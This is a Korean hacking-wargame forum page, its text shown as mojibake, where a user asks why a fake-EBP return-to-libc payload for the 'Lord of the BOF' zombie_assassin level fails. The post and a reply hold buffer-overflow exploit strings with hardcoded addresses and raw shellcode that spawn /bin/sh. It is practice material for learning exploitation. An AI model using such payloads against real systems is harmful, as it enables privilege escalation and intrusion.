·¹º§ ÇØÅ·

 2844, 1/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   incaro
   [LOB] LEVEL16 - FAKE EBP ¹®Á¦ Áú¹®.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3216 [º¹»ç]


¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬
1) FAKE EBP¸¦ ¹öÆÛÀÇ ½ÃÀÛ ÁÖ¼Ò·Î ÇÏ¿© RTL ÇÏ¸é ¼º°ø
[ "AAAA" ] + [system()] + [exit()] + ["/bin/sh"] + [NOP*24] + [fake ebp:(buffer)] + [leave;let]
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\x90"*24 + "\xb0\xfa\xff\xbf" + "\x32\x85\x04\x08"')
¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ
2) FAKE EBP¸¦ argv[2]·Î ÇÏ¿© RTL ÇÏ¸é ½ÇÆÐ.
ARGV[1]::([ "D"*40 ] + [fake ebp:(argv[2])] + [leave;ret])  
ARGV[2]::(["AAAA"] + [system()] + [exit()] + ["/bin/sh"])
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "D"*40 + "\x48\xfc\xff\xbf" + "\x32\x85\x04\x08"') $(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬
¡Ø(À§ÀÇ leave;ret ÁÖ¼Ò´Â »çº» ÁÖ¼Ò ÀÔ´Ï´Ù)

¡Ø 1¹øÀº µÇ°í 2¹øÀº ¾ÈµË´Ï´Ù. (ÁÖ¼Ò°¡ Ʋ¸±½Ã Segmentation fault°¡ ³ªÁö¸¸ ¿¡·¯µµ ¾ø½À´Ï´Ù.)
ÀÌÀ¯¸¦ ¸ð¸£°Ú³×¿ä.
  Hit : 2953     Date : 2011/06/11 07:18


    
¸Û¸Û À̰͵µ ³»ÀÏ ´äº¯ µå¸±²²¿ä~ ½Ã°£ÀÌ ³Ñ ´Ê¾î¼­~~ 2011/07/04  
¸Û¸Û ÀÌ·² ¶© gdb¸¦ ºÙ¿©¼­ instruction ´ÜÀ§·Î ÄÚµå È帧À» µû¶ó°¡¸ç ¹®Á¦Á¡À» ã¾Æº¸¼¼¿é! 2011/07/06  
¸Û¸Û Âü°í·Î Á¦°¡ »ç¿ëÇß´ø payloadÀÔ´Ï´Ù Àúµµ argv[2]¸¦ ½è¾ú±¸¿ä~

./zombie_assassin `perl -e 'printf "\xe7\xfb\xff\xbf"x10 . "\xb0\xfb\xff\xbf" . "\xdf\x84\x04\x08"'` `perl -e 'printf "\x90"x50 . "\xb8\xb8\x91\x2e\x55\x31\xc9\xd9\xc3\xd9\x74\x24\xf4\xb1\x0b\x5d\x31\x45\x13\x03\x45\x13\x83\xed\xfc\xe2\x4d\xfb\x25\x0d\x34\xae\x5f\xc5\x6b\x2c\x29\xf2\x1b\x9d\x5a\x95\xdb\x89\xb3\x07\xb2\x27\x45\x24\x16\x50\x5d\xab\x96\xa0\x71\xc9\xff\xce\xa2\x7e\x97\x0e\xea\xd3\xee\xee\xd9\x54"'`

\xb8\xb8 .... Àº Æò¹üÇÑ ½©ÄÚµåÀÔ´Ï´Ù		 2011/07/06  
2844   hack the box vpn ¼³Ä¡°¡ ¾È µË´Ï´Ù[2]     jyk5350
 07/16 1873
2843   ¿ö°ÔÀÓ¿¡¼­ ½ÇÁ¦ ÇÁ·ÎÁ§Æ®±îÁö À̾îÁö´Â °úÁ¤¿¡ °ü·ÃµÈ Áú¹®[2]     junhee329
 04/28 1610
2842   ftz Á¢¼Ó °ü·Ã[1]     pk2861
 04/01 2007
2841   level8ÀÇ ÈùÆ®ÆÄÀÏ ÈѼÕ[2]     MunHue
 06/05 2201
2840   ·¹º§1ÀÇ /bin/bash ¸í·É¾î....     MunHue
 05/15 2366
2839   ftz level4¿¡¼­ finger¸í·É¾î     krimson701
 04/20 2473
2838   /bin/bash¿¡ °üÇؼ­[3]     MunHue
 04/19 2562
2837   FC10 3¹ø ¹®Á¦ Áú¹®ÀÔ´Ï´Ù.[2]     tjdalstjr938
 04/02 2576
2836   ftzÀÌ ¾ÈµÇ¿ä¤Ð¤Ð¤Ð¤Ð¤Ð[1]     ersd145
 04/13 3236
2835   fedora core4 cruel Áú¹®[4]     vngkv123
 03/29 2714
2834   Fedora core4...[3]     vngkv123
 03/28 2707
2833   lob evil_wizard...[2]     vngkv123
 03/27 2368
2832   lob gremlin....[1]     vngkv123
 03/22 3732
2831   ftz level11 Áú¹®[1]     vngkv123
 03/19 2403
2830   pwnable.kr passcode¹®Á¦ Áú¹®...[3]     vngkv123
 03/14 2426
2829   ¿ö°ÔÀÓ Á¢ÇÒ ¼ö ÀÖ´Â »çÀÌÆ® ¾Ë·ÁÁÖ¼¼¿ä.[2]     ¿À¼Ò¸®
 02/23 4007
2828   ¿ö°ÔÀÓ ±â¹Ý Áö½Ä¿¡ °üÇÑ Áú¹®[1]     salangi11
 02/22 2307
2827   ftz Ç®±âÀ§ÇØ ÇÊ¿äÇÑ Áö½ÄÀÌ ±Ã±ÝÇÕ´Ï´Ù.[1]     read1516
 01/13 2724
2826   Lob[1]     km1434
 12/20 2509
2825   FTZ level4 ½© ¶ç¿ì´Â ¹®Á¦      kimstz0
 10/09 2938
1 [2][3][4][5][6][7][8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org